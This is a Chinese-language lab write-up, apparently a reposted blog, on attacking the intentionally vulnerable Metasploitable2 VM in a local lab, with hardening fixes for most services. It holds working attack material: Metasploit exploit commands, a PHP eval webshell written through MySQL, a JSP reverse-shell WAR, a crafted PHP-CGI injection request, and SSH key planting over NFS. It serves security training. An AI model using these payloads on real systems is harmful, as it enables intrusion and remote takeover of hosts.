龙空技术网

Metasploitable2笔记(漏洞利用与加固)

区块软件开发 405

前言:

当前同学们对“php cgi解析漏洞”大约比较讲究,姐妹们都需要学习一些“php cgi解析漏洞”的相关知识。那么小编同时在网摘上网罗了一些有关“php cgi解析漏洞””的相关知识,希望我们能喜欢,各位老铁们快快来了解一下吧!

Metasploitable2笔记

Author:p1ng

tips:

setg命令可以将LHOST.LPORT等参数设置为全局变量,而不是局限于这一个模块内;

首先对靶机进行初步的探测扫描,可以检测到目标靶机开启的端口

Starting Nmap 7.91 (  ) at 2023-03-19 09:35 CSTNmap scan report for 172.16.1.140Host is up (0.0035s latency).Not shown: 65505 closed portsPORT      STATE SERVICE     VERSION21/tcp    open  ftp         vsftpd 2.3.422/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp    open  telnet      Linux telnetd25/tcp    open  smtp        Postfix smtpd53/tcp    open  domain      ISC BIND 9.4.280/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)111/tcp   open  rpcbind     2 (RPC #100000)139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)512/tcp   open  exec        netkit-rsh rexecd513/tcp   open  login       OpenBSD or Solaris rlogind514/tcp   open  shell       Netkit rshd1099/tcp  open  java-rmi    GNU Classpath grmiregistry1524/tcp  open  bindshell   Metasploitable root shell2049/tcp  open  nfs         2-4 (RPC #100003)2121/tcp  open  ftp         ProFTPD 1.3.13306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu53632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.75900/tcp  open  vnc         VNC (protocol 3.3)6000/tcp  open  X11         (access denied)6667/tcp  open  irc         UnrealIRCd6697/tcp  open  irc         UnrealIRCd8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.18787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)33190/tcp open  status      1 (RPC #100024)41194/tcp open  mountd      1-3 (RPC #100005)42383/tcp open  nlockmgr    1-4 (RPC #100021)57815/tcp open  java-rmi    GNU Classpath grmiregistryMAC Address: 00:0C:29:EF:27:00 (VMware)Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at  .Nmap done: 1 IP address (1 host up) scanned in 154.18 seconds                                                                                         (rootkali2021)-[~]# nmap -A -p- 172.16.1.140 Starting Nmap 7.91 (  ) at 2023-03-19 15:25 CSTNmap scan report for 172.16.1.140Host is up (0.00076s latency).Not shown: 65504 closed portsPORT      STATE    SERVICE     VERSION21/tcp    open     ftp         vsftpd 2.3.4|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst: |   STAT: | FTP server status:|      Connected to 172.16.1.123|      Logged in as ftp|      TYPE: ASCII|      No session bandwidth limit|      Session timeout in seconds is 300|      Control connection is plain text|      Data connections will be plain text|      vsFTPd 2.3.4 - secure, fast, stable|_End of status22/tcp    open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)23/tcp    open     telnet      Linux telnetd25/tcp    open     smtp        Postfix smtpd|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, |_ssl-date: 2023-03-19T05:37:47+00:00; -1h50m03s from scanner time.| sslv2: |   SSLv2 supported|   ciphers: |     SSL2_RC4_128_EXPORT40_WITH_MD5|     SSL2_RC2_128_CBC_WITH_MD5|     SSL2_RC4_128_WITH_MD5|     SSL2_DES_192_EDE3_CBC_WITH_MD5|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5|_    SSL2_DES_64_CBC_WITH_MD553/tcp    open     domain      ISC BIND 9.4.2| dns-nsid: |_  bind.version: 9.4.280/tcp    open     http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2|_http-title: Metasploitable2 - Linux111/tcp   open     rpcbind     2 (RPC #100000)| rpcinfo: |   program version    port/proto  service|   100000  2            111/tcp   rpcbind|   100000  2            111/udp   rpcbind|   100003  2,3,4       2049/tcp   nfs|   100003  2,3,4       2049/udp   nfs|   100005  1,2,3      36047/udp   mountd|   100005  1,2,3      53679/tcp   mountd|   100021  1,3,4      48263/udp   nlockmgr|   100021  1,3,4      51481/tcp   nlockmgr|   100024  1          53113/tcp   status|_  100024  1          56995/udp   status139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp   open     netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)512/tcp   open     exec        netkit-rsh rexecd513/tcp   open     login       OpenBSD or Solaris rlogind514/tcp   open     shell       Netkit rshd1099/tcp  open     java-rmi    GNU Classpath grmiregistry1524/tcp  open     bindshell   Metasploitable root shell2049/tcp  open     nfs         2-4 (RPC #100003)2121/tcp  open     ftp         ProFTPD 1.3.13306/tcp  open     mysql       MySQL 5.0.51a-3ubuntu5| mysql-info: |   Protocol: 10|   Version: 5.0.51a-3ubuntu5|   Thread ID: 9|   Capabilities flags: 43564|   Some Capabilities: Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, ConnectWithDatabase|   Status: Autocommit|_  Salt: bCg[rLf;2(s+yC#$':.t3632/tcp  open     distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))5432/tcp  open     postgresql  PostgreSQL DB 8.3.0 - 8.3.7|_ssl-date: 2023-03-19T05:37:47+00:00; -1h50m03s from scanner time.5900/tcp  open     vnc         VNC (protocol 3.3)| vnc-info: |   Protocol version: 3.3|   Security types: |_    VNC Authentication (2)6000/tcp  open     X11         (access denied)6200/tcp  filtered lm-x6667/tcp  open     irc         UnrealIRCd6697/tcp  open     irc         UnrealIRCd8009/tcp  open     ajp13       Apache Jserv (Protocol v1.3)|_ajp-methods: Failed to get a valid response for the OPTION request8180/tcp  open     http        Apache Tomcat/Coyote JSP engine 1.1|_http-favicon: Apache Tomcat|_http-server-header: Apache-Coyote/1.1|_http-title: Apache Tomcat/5.58787/tcp  open     drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)51481/tcp open     nlockmgr    1-4 (RPC #100021)53113/tcp open     status      1 (RPC #100024)53679/tcp open     mountd      1-3 (RPC #100005)55742/tcp open     java-rmi    GNU Classpath grmiregistryMAC Address: 00:0C:29:EF:27:00 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.33Network Distance: 1 hopService Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: -50m02s, deviation: 2h00m01s, median: -1h50m03s|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)| smb-os-discovery: |   OS: Unix (Samba 3.0.20-Debian)|   Computer name: metasploitable|   NetBIOS computer name: |   Domain name: localdomain|   FQDN: metasploitable.localdomain|_  System time: 2023-03-19T01:37:38-04:00| smb-security-mode: |   account_used: guest|   authentication_level: user|   challenge_response: supported|_  message_signing: disabled (dangerous, but default)|_smb2-time: Protocol negotiation failed (SMB2)TRACEROUTEHOP RTT     ADDRESS1   0.76 ms 172.16.1.140OS and Service detection performed. Please report any incorrect results at  .Nmap done: 1 IP address (1 host up) scanned in 168.33 seconds
21/tcp ftpvsftpd2.3.4method1

通过metaspolit集成工具平台使用其中的exploit/unix/ftp/vsftpd_234_backdoor模块进行利用

method2

手动利用,首先我们先正常用ftp服务连接目标靶机,然后输入用户名root:),随便输入一个密码

输入密码进行等待的时候我们用nc进行连接其6200端口nc 172.16.1.140 6200

漏洞修复method1

通过修改vsdtpd.conf文件,禁止用本地用户进行登入,只能创建vsftpd的用户或者使用匿名用户进行登入

local_enable=YES修改为local_enable=NO

method2(优)

通过iptables防火墙来进行对6200端口的流量进行拦截从而进行防护

iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 6200 -j DROP

22/tcp sshCVE-2020-15778

简介: 该漏洞主要针对于知道ssh用户的密码但是不允许进行登入的情况

method1

已知root用户的密码为123456此时我们利用scp命令进行利用

scp 1.txt  root:172.16.1.140:'`touch /tmp/test.txt` /tmp'

利用scp命令将本地的1.txt文件上传到tmp目录下,并存为test.txt

参考文献:

22/tcp smtpmethod1

通过SMTP对服务器中的用户名进行枚举

Kali> telnet 172.16.1.140 25>VRFY sys # 查看目标机器中是否存在这些用户Kali> smtp-user-enum -M VRFY -U  <userlist> -t <target IP> # 通过 smtp-user-enum工具对目标机器的用户进行枚举
参考文献:

method2

可以利用sslv2-drown脚本对smtp服务进行扫描

smtp.domainSee the documentation for the smtp library. # 
111/tcp rpcbind && 2049/tcp nfsnfs服务的错误配置(Mis-Configured NFS Share)method1
Kali> showmount -e 172.16.1.140 # 显示NFS服务器上的挂载信息,也可以限制客户端对NFS服务器的访问情况Kali> mkdir -p /root/.ssh # 创建一个存储ssh登入公钥私钥的文件夹Kali> cd /root/.ssh # 进入到/root/.ssh目录Kali> cat /dev/null > known_hosts # /dev/null:表示将输出重定向到空设备,即不输出任何内容;known_hosts:是保存已知主机密钥的文件名;所以这个命令的作用就是清除known_hosts文件Kali> ssh-keygen -t rsa -b 4096  #  生成一个密钥文件> nter file in which to save the key (/root/.ssh/id_rsa): test # 生成的文件命名为 testKali> mount -t nfs 172.16.1.140:/ /mnt/ # 将172.16.1.140从根目录下的所有文件挂栽到/mnt目录下Kali> cp /root/.ssh/test.pub /mnt/root/.ssh # 将生成的test.pub复制到挂载在mnt的目标服务器的ssh私钥目录Kali> cat test.pub >> authorized_keys # 将test.pub的内容加在authorized_keys文件的后面Kali> ssh -i /root/.ssh/test root@172.16.1.140 # 用生成的ssh私钥实现无密码登入靶机的
参考文献:

修复方法:

可以通过NFS服务器上指定/etc/exports文件来限制共享的目录

139/tcp && 445/tcp sambaCVE-2007-2447(Samba MS_RPC Shell命令注入漏洞)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
method1
Kali> msfconsole # 进入metasploitmsf6> search usermap # 查询Samba MS_RPC shell的模块msf6> use exploit/multi/samba/usermap_script # 使用这个模块msf6> set RHOSTS <target> # 设置目标主机的IPmsf6> set LHOST <machine> # 设置监听主机的IP(这一步一定要设置,不能够省略)
修复方法:

通过修改配置文件/etc/samba/smb.conf注释掉username map script=/etc/samba/scripts/mapusers.sh

1524/tcp backdoor Metasploitable root shell(Ingreslock)

系统的恶意后门

nc 172.16.1.140 1524telnet 172.16.1.140 1524
修复方式:

先找到该恶意程序的进程号,先将进程kill,然后再找到源文件,将源文件进行删除

3306/tcp Mysql

MySQL服务,超级用户空密码,且并没有过滤危险函数

method1

Kali> MySQL -u root -h 172.16.1.140 # 远程连接mysql服务,并且以超级用户的身份登入MySQL> select load_file('/etc/passwd'); # 利用load_file函数,查看本地文件

没有对mysql的危险函数做限制,可以通过into outfile等函数配合http服务get shell

Mysql> show global variables like '%secure%'; # 查看secure_file_priv选项有没有值,secure_file_priv参数若没有值则可以进行操作,若不为空则需要通过配置文件对其进行修改Mysql> select "<?php @eval($_POST[1]);?>" into outfile "/var/www/html/test.php"; # 写入一句话木马到Web目录下
method2

通过修改日志文件的存储位置和文件的后缀,从而getshell

Mysql> show variables like "%general%"; # 查看general_log的具体选项Mysql> set global general_log='ON'; # 如果general_log参数未开启的时候,利用set语句将其打开Mysql> set global general_log_file = '/var/www/html/test.php'; # 将其日志文件设置于Web目录下,并且将其后缀改为php让web服务器解析Mysql> select "<?php @eval($_POST[1]);?>"; # select一下一句话木马,此时一句话木马就会出现在test.php文件中即可getshell# metasploitable2中的MySQL并没有这个选项
修复方式修改secure_file_priv参数的值,限制into outfile/load_file函数可执行的目录,修改配置文件my.cnf
Kali> vim /etc/mysql/my.cnf # 修改mysql的配置文件vim> security_file_priv = '/tmp' # 限制为tmp目录下
修改my.cnf文件中的general_log参数,将其修改为general_log=05432/tcp postgresqlCVE-2007-3280method1
Kali> msfconsolemsf6> use exploit/linux/postgres/postgres_payloadmsf6> set RHOSTS  172.16.1.140msf6> exploit
参考资料

8180/tcp HTTPTomcatmethod1

Kali> msfconsolemsf6> use auxiliary/scanner/http/tomcat_mgr_login # 辅助模块,用于爆破tomcat服务器的用户名和密码然后进去其后台部署War包进行getshellmsf6> setg RHOSTS 172.16.1.140msf6> setg RPORT 8180msf6> exploit # 进行爆破,如果爆破不成功则调整PASS_FILE参数和USERPASS_FILEmsf6> use exploit/multi/http/tomcat_mgr_deploy # 利用Tomcat管理页面的缺陷进行部署和执行恶意WAR文件msf6> set HttpUsername tomcatmsf6> set HttpPassword tomcat msf6> exploit
method2(手工复现)
Kali> msfvenom -p java/jsp_shell_reverce_tcp LHOST=172.16.1.123 LPORT=8848 -f war > shell.war # 利用msfvenom工具以java/jsp_shell_reverce_tcp为载荷172.16.1.123为监听IP,8848为监听端口生成一个War格式的木马msf6> use exploit/multi/handlermsf6> set payload java/jsp_shell_reverce_tcp msf6> exploitKali> firefox

点击Tomcat Manager选项,然后输入tomcat的用户名和密码

成功进入后台后,将我们利用msfvenom生成的war包部署进去,即可在目录中看见新增的路径,我们点击路径,开启监听的handler模块即可收到反弹的shell

修复方法更改Tomcat服务的默认用户名与密码禁用Tomcat管理页面或者限制其访问权限3632/tcp Distccd

原理: Discccd是一个分布式编译器,用于加速编译过程,其客户端和服务器之间使用了没有身份验证的RCE协议进行通信

msf6> use exploit/unix/misc/distcc_execmsf6> set payload payload/cmd/unix/reversemsf6> set RHOSTS 172.16.1.140msf6> set LHOST 172.16.1.123msf6> exploit
6667/tcp6 697/tcp Unreal lRcd

UnreallRcd后门漏洞

msf6> use exploit/unix/irc/unreal_ircd_3281_backdoormsf6> set payload payload/cmd/unix/reversemsf6> set RHOSTS 172.16.1.140msf6> set LHOST 172.16.1.123msf6> exploit
1099/tcp Java rmi

利用Java JMX服务的漏洞进行远程代码执行.Java JMXJava的一个管理和监控API,允许开发人员检测和管理Java应用程序

msf6> use exploit/multi/misc/java_jmx_servermsf6> set payload payload/cmd/unix/reversemsf6> set RHOSTS 172.16.1.140msf6> set LHOST 172.16.1.123msf6> exploit
修复方法:

修改Java JMX的配置文件,禁止远程访问或指定访问控制策略,避免未授权访问

找到Java JMX的配置文件jmxremote.accessjmxremote.password,通常位于\<JAVA_HOME>/jre/lib/management目录下,如果该目录下没有这两个文件,则需要手动创建修改jmxremote.access文件,添加一下内容,表示只允许本地访问:

monitorRolereadonlycontrolRolereadwrite \create javax.management.monitor.*,javax.management.timer.* \unregister
修改jmxremote.password文件,添加以下内容,表示只允许本地访问
monitorRolemonitorRolePasswordcontrolRole controlRolePassword # 其中 monitorRolePassword 和 controlRolePassword 是密码,需要设置为强密码,避免被猜解或者暴力破解
修改Java JMX的启动参数,以加载修改后的配置文件,在启动Java引用程序时需要添加一下参数
-Docm.sun.management.jmxremote.port=<port> \-Dcom.sun.management.jmxremote.ssl=false \-Dcom.sun.management.jmxremote.authenticate=true \-Dcom.sun.management.jmxremote.password.file=<path>/jmxremote.password \-Dcom.sun.management.jmxremote.access.file=<path>/jmxremote.access
PHP CGI参数注入执行漏洞

PHP 5.4.0PHP 5.4.3版本中,攻击者可以在Web服务器上执行任意代码.攻击者通过构造特定的HTTP请求,向服务器注入任意命令,并在服务器上执行这些命令

msf6> use exploit/multi/http/php_cgi_arg_injectionmsf6> set RHOSTS 172.16.1.140msf6> set LHOST 172.16.1.123msf6> exploit
method2(手工)
curl 172.16.1.140/?-s # 显示源代码

这里拓展一下PHP的参数

-c 指定php.ini文件的位置-n 不要加载php.ini文件-d 指定配置项-b 启动fastcgi进程-s 显示文件源码-T 执行指定次数该文件-h和-?显示帮助

我们可以通过-d指定auto_prepend_file来指导任意文件包含漏洞,同时需要将allow_url_include设置为on执行任意代码

Payload : ?-d allow_url_include=on -d auto_prepend_file=php://input将=与:进行URL编码得,空格用+代替Payload: -?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

我们构造数据包

POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: 172.16.1.140Content-Length: 34Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Origin: : application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: : gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close<?php echo shell_exec('whoami');?>
修复方法:

修改http.conf文件,找到\<Directory/>增加如下内容

RewriteEngine onRewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$[NC]RewriteRule ^(.*) $1?[L]
参考资料

from

标签: #php cgi解析漏洞